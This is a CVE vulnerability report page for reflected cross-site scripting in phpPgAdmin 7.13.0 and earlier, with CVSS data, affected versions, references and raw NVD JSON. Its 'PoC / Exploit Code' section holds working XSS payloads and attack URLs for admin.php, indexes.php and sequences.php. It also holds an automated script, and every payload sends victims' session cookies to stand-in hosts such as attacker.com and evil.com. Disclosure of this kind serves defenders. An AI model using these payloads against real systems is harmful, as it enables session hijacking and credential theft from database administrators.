Security Vulnerability Report
CVE-2025-60796 CVSS 6.1 MEDIUM

CVE-2025-60796

Published: 2025-11-20 15:17:38
Last Modified: 2025-11-25 19:15:25

Description

phpPgAdmin 7.13.0 and earlier contains multiple cross-site scripting (XSS) vulnerabilities across various components. User-supplied input from $_REQUEST parameters is reflected in HTML output without proper encoding or sanitization in multiple locations including sequences.php, indexes.php, admin.php, and other unspecified files. An attacker can exploit these vulnerabilities to execute arbitrary JavaScript in victims' browsers, potentially leading to session hijacking, credential theft, or other malicious actions.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:phppgadmin_project:phppgadmin:*:*:*:*:*:*:*:* - VULNERABLE
phpPgAdmin <= 7.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-60796 PoC - phpPgAdmin XSS -->

<!-- Admin.php XSS PoC -->
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

<!-- Indexes.php XSS PoC -->
<script>new Image().src='https://attacker.com/log?c='+document.cookie;</script>

<!-- Sequences.php XSS PoC -->
<svg/onload=fetch('https://attacker.com/cookie?c='+btoa(document.cookie))>

<!-- Example attack URL (admin.php) -->
<!-- https://phppgadmin-host/admin.php?action=<script>document.location='https://attacker.com/steal?c='+document.cookie</script> -->

<!-- Example attack URL (indexes.php) -->
<!-- https://phppgadmin-host/indexes.php?index=<img src=x onerror=fetch('https://evil.com/?c='+document.cookie)> -->

<!-- Example attack URL (sequences.php) -->
<!-- https://phppgadmin-host/sequences.php?sequence=<script>new Audio().src='https://attacker.com/pwn?d='+btoa(JSON.stringify({cookie:document.cookie,url:location.href}))</script> -->

<!-- Automated PoC (JavaScript) -->
(function(){
  var targets = [
    '/admin.php?action=',
    '/indexes.php?index=',
    '/sequences.php?sequence='
  ];
  var payload = '<script>fetch("https://attacker.com/log?c="+btoa(document.cookie))</script>';
  targets.forEach(function(t){
    var img = new Image();
    img.src = t + encodeURIComponent(payload);
  });
})();

References

https://github.com/phppgadmin/phppgadmin/blob/master/admin.php#L35 (Product)
https://github.com/phppgadmin/phppgadmin/blob/master/indexes.php#L29 (Product)
https://github.com/phppgadmin/phppgadmin/blob/master/sequences.php#L316 (Product)
https://github.com/pr0wl1ng/security-advisories/blob/main/CVE-2025-60796.md (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60796", "sourceIdentifier": "[email protected]", "published": "2025-11-20T15:17:38.100", "lastModified": "2025-11-25T19:15:25.377", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "phpPgAdmin 7.13.0 and earlier contains multiple cross-site scripting (XSS) vulnerabilities across various components. User-supplied input from $_REQUEST parameters is reflected in HTML output without proper encoding or sanitization in multiple locations including sequences.php, indexes.php, admin.php, and other unspecified files. An attacker can exploit these vulnerabilities to execute arbitrary JavaScript in victims' browsers, potentially leading to session hijacking, credential theft, or other malicious actions."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phppgadmin_project:phppgadmin:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.13.0", "matchCriteriaId": "AC3CB38F-12CA-4FA6-98DB-FFCC98F26715"}]}]}], "references": [{"url": "https://github.com/phppgadmin/phppgadmin/blob/master/admin.php#L35", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/phppgadmin/phppgadmin/blob/master/indexes.php#L29", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/phppgadmin/phppgadmin/blob/master/sequences.php#L316", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/pr0wl1ng/security-advisories/blob/main/CVE-2025-60796.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}